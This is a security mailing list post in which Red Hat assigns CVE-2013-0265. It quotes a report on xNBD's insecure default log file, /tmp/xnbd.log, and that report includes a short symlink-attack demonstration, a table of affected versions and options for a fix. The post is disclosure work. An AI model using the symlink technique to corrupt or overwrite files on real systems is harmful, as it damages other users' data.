Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 06 Feb 2013 20:39:46 -0700
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Sebastian Pipping <sebastian@...ping.org>
Subject: Re: CVE request: Insecure default log file path in
 xNBD

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 02/06/2013 09:48 AM, Sebastian Pipping wrote:
> Hello oss-security!
> 
> 
> Target software ===============
> 
> xNBD upstream https://bitbucket.org/hirofuchi/xnbd
> 
> Official Debian packages 
> http://packages.debian.org/sid/xnbd-server
> 
> 
> Description ===========
> 
> xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log 
> for logging when parameter --daemonize (and no --logpath FILE) is
> given.
> 
> The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so
> there is a vulnerability against symlinks attacks.
> 
> 
> Demonstration =============
> 
> Here is an exploitation example:
> 
> $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
> 
> $ touch DISK $ truncate --size=$((100*1024**2)) DISK
> 
> $ /usr/sbin/xnbd-server --daemonize --target DISK 
> xnbd-server(12462) msg: daemonize enabled xnbd-server(12462) msg:
> cmd target mode xnbd-server(12462) msg: disk DISK size 104857600 B
> (100 MB) xnbd-server(12462) msg: xnbd master initialization done 
> xnbd-server(12462) msg: logfile /tmp/xnbd.log
> 
> $ ls -l ~/ATTACK_TARGET -rw------- 1 user123 user123 653 Feb  1
> 16:41 \ /home/user123/ATTACK_TARGET
> 
> 
> Affected versions =================
> 
> The latest code in the upstream Mercurial repository is not
> affected since it does not use logging to /tmp/xnbd.log (or any
> default location) any more.
> 
> ----------------------------------------------------------------------
>
> 
Version                        Status
> ----------------------------------------------------------------------
>
> 
0.0.x                          not analyzed
> 0.1.0-pre                      VULNERABLE (xnbd-server only) 
> 0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and
> -wrapper) Mercurial tip                  not vulnerable 
> ----------------------------------------------------------------------
>
> 
> 
> Options for a fix =================
> 
> a) Use syslog with --daemonize and no default file location in
> general (i.e. what upstream did)
> 
> b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log for
> the hard-coded defaults
> 
> c) Replace flag O_APPEND by O_EXCL  (secure but reducing
> functionality)
> 
> The attached patch applies approach (b) to version 
> 0.1.0-pre-hg20-e75b93a47722.
> 
> 
> Best,
> 
> 
> 
> Sebastian

Please use CVE-2013-0265  for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJREyICAAoJEBYNRVNeJnmTL1MQAKARq2UGnD671ZfOdM2COAdP
cQkAT8VD9mBIm1ybe2YwQ0vqpoflOdpIhoW9CsQvvtb3FvDC60kM/2nnAMBv3Ujp
HgLquNw1wtnzIO3M2N/qfpYtYVoBxHB9TSwBsXMyinJtgg4zjYwjkuflE4Ko6rgr
dQ2jjAESgeIGZPWkUGcfRJsZGagO5PGIIv3FWgfsOR+M9dkkN+jdY/fGqCqp+NlP
8UbCdwYEJG73aHn+sI7wEGlpKCsuJzOCFo8FBc8C6N3DpvwFZbyRh45DGVhS3D9k
cNIES1RNmjwsdBsW0k9cQfP+YCTmR6O3IT/3ruXIalF15hkoIkeJT4/y+1gMqWnQ
kfqcDqcCFiezMCvhB0WDNp0OnJAfrcjfleZhNcathImxZqENfcaWpwI5OnIPRwLJ
asn5Og54RdRL4QZsBHLb7cSSNQyeoNRBsdAqz8tQGoZ5DIX22prMCSjrJ4jUnJWg
HCD0Z/xCO4ZAp6lU+Sf4nfYTbent5xBgH1ap88IRFbOEriZisqS14fnsA6++jQZs
dtr6yDoMlvCwlIwAxkMeUz5JLTRI6zWlHpe/doIyEoxjmr18GKx1OPExr0LzetzI
qB9TN4oWTHyhotPdkidlFQ4lXM4HTmYmoI+wF9rE1ulnGIqUTZpWffkzItX2pbaO
HLOXt5NW5Y+8xWz0l6Of
=L+gz
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ